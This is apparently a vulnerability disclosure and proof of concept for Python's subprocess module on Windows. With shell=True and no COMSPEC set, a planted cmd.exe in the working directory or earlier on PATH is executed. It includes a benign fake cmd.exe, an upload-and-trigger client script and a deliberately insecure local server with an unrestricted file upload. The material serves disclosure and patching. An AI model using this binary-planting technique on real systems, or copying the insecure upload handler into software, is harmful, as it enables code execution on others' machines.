Python Subprocess Vulnerability - POC RCE

There is a vulnerability in python subprocess module. When subprocess.Popen was launched with shell=True on Windows and without COMSPEC environment variable, the executable launched is cmd.exe and the full path is not defined.

It's possible to launch a malicious cmd.exe file from working directory or any any path before the C:\Windows\system32 directory in the PATH.

I write a simple POC, a vulnerable HTTP server to upload files. I have opened a new issue here.

Requirements

• Windows machine without COMSPEC environment variable
• Use subprocess.Popen or any subprocess functions that use subprocess.Popen with shell=True
• The attacker may upload file in the working directory or any directory before the C:\Windows\system32 directory in the PATH

Patch

Replace cmd.exe by C:\WINDOWS\system32\cmd.exe in subprocess module.

Client Exploit

Fake malicious cmd.exe for POC

#include <stdio.h>
int main() {printf("H4CK3D - EXPLOIT IS WORKING\n");return 0;}
# gcc -o not_cmd.exe RCE_program.c

Compile with gcc -o not_cmd.exe RCE_program.c command.

Python HTTP client

from urllib.request import Request, urlopen
from time import strftime, localtime, sleep

print("[*]", strftime("%Y-%m-%d %H:%M:%S", localtime()), "Simple GET request to see the default behaviour...")
get_response = urlopen("http://127.0.0.1:8000/")
sleep(2)
print("[+]", strftime("%Y-%m-%d %H:%M:%S", localtime()), "Start exploit with upload a malicious cmd.exe file...")
post_response = urlopen(Request("http://127.0.0.1:8000/cmd.exe", data=open('not_cmd.exe', 'rb').read())) # write a cmd.exe file
sleep(2)
print("[+]", strftime("%Y-%m-%d %H:%M:%S", localtime()), "RCE with malicious cmd.exe file...")
exploit_response = urlopen("http://127.0.0.1:8000/")                                                     # RCE -> cmd.exe file is executed instead of C:\WINDOWS\system32\cmd.exe

Vulnerable server code

from wsgiref.simple_server import make_server
from subprocess import Popen, DEVNULL
from os.path import basename
from sys import executable
from os import environ

del environ['COMSPEC']  # force environment without COMSPEC

def app(environ, start_response):
    method = environ["REQUEST_METHOD"]
    print('[*] New request, method:', method)
    if method == "GET":
        process = Popen("myprogram", shell=True, stderr=DEVNULL)
        process.communicate()
        print('[+] Process exit code:', process.returncode)
        status = "200 OK"
        content = b"GET OK"
    elif method == "POST":
        status = "200 OK"
        content = b"File uploaded successfully."
        content_length = environ.get("CONTENT_LENGTH", "0")
        if content_length.isdigit():
            filename = basename(environ["PATH_INFO"])
            with open(filename, 'wb') as file:
                file.write(environ["wsgi.input"].read(int(content_length)))
            print('[+] New file written:', filename)
        else:
            status = "400 Bad Request"
            content = b'Invalid Content-Length header.'
    else:
        status = "400 Bad Request"
        content = b"Only GET and POST methods allowed."
    start_response(status, [('Content-type', 'text/plain')])
    return (content,)

with make_server('127.0.0.1', 8000, app) as httpd:
    print('[*] Serving HTTP on 127.0.0.1 port 8000 (http://127.0.0.1:8000/) ...')
    httpd.serve_forever()